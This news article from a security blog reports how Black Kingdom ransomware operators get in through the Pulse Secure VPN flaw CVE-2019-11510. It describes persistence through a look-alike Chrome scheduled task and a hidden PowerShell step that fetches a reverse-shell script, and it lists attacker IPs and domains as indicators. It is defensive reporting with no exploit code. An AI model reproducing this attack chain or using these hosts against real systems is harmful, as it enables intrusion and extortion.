Cyber Crime

Black Kingdom ransomware operators exploit Pulse VPN flaws

Black Kingdom ransomware operators are targeting organizations using unpatched Pulse Secure VPN software to deploy their malware.

Researchers from security firm REDTEAM reported that operators behind the Black Kingdom ransomware are targeting enterprises exploiting the CVE-2019-11510 flaw in Pulse Secure VPN software to gain access to the network.

Black Kingdom ransomware was first spotted in late February by security researcher GrujaRS. the malicious code encrypts files and appends the .DEMON extension to filenames of the encrypted documents.

Early this year, the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) warned organizations that attackers continue to exploit the well known Pulse Secure VPN vulnerability tracked as CVE-2019-11510.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.

“Unauthenticated remote attacker with network access via HTTPS can send a specially crafted URI to perform an arbitrary file reading vulnerability.” reads the advisory.

The vulnerability could be easily exploitable by using publicly available proof-of-concept code. The flaw can be used in combination with the CVE-2019-11539 remote command injection issue gain access to private VPN networks.

The vulnerability was addressed in April 2019, but many organizations delayed updating their servers.

Researchers from security firm REDTEAM discovered that the Black Kingdom ransomware Black Kingdom ransomware establishes persistence by impersonating a legitimate scheduled task for Google Chrome. Attackers used a name that differs from the legitimate task for a single letter:

GoogleUpdateTaskMachineUSA - Black Kingdom task
GoogleUpdateTaskMachineUA - legitimate Google Chrome task

Redteam researchers published an analysis detailing TTPs and IOC for the Black Kingdom ransomware.

“Attackers gained initial access to the infrastructure via Pulse Secure VPN vulnerability [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510]. For persistence they use a scheduled task [https://attack.mitre.org/techniques/T1053/].” reads the analysis published by Redteam. “Task name is GoogleUpdateTaskMachineUSA, which resembles a legitimate task of Google Chrome that ends with UA, not USA. “

REDTEAM researchers reported that the scheduled task runs a Base64-encoded string code in a hidden PowerShell window to fetch a script named “reverse.ps1” that establishes a reverse shell on the infected machine.

Below the content of the cversions_cache.ps1 powershell script:

The “reverse.ps1” script resides at 198.13.49[.]179, which is operated by the Choopa provider that was used by other cybercriminal gangs.

“It [198.13.49[.]179] resolves to three domains, the third one being connected to other servers in the U.S. and Italy hosting Android and cryptocurrency mining malware.” reported BleepingComputer.

  • host.cutestboty.com
  • keepass.cutestboty.com
  • anno1119.com

Below the ransom note asking dropped by the ransomware on the infected hosts. The operators demanded $10,000 worth of Bitcoin to decrypt the files and avoid that they will be destroyed or sold.

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – Black Kingdom ransomware, ransomware)

[adrotate banner=”5″]

[adrotate banner=”13″]

Pierluigi Paganini

Pierluigi Paganini is member of the ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group and Cyber G7 Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Recent Posts

Google: China dominates government exploitation of zero-day vulnerabilities in 2023

Google's Threat Analysis Group (TAG) and Mandiant reported a surge in the number of actively…

2 hours ago

Google addressed 2 Chrome zero-days demonstrated at Pwn2Own 2024

Google addressed two zero-day vulnerabilities in the Chrome web browser that have been demonstrated during…

13 hours ago

INC Ransom stole 3TB of data from the National Health Service (NHS) of Scotland

The INC Ransom extortion group hacked the National Health Service (NHS) of Scotland and is threatening…

18 hours ago

CISA adds Microsoft SharePoint bug disclosed at Pwn2Own to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft SharePoint vulnerability disclosed at the…

23 hours ago

The DDR Advantage: Real-Time Data Defense

This is the advantage of Data Detection and Response (DDR) for organizations aiming to build…

1 day ago

Finnish police linked APT31 to the 2021 parliament attack

The Finnish Police attributed the attack against the parliament that occurred in March 2021 to…

1 day ago

This website uses cookies.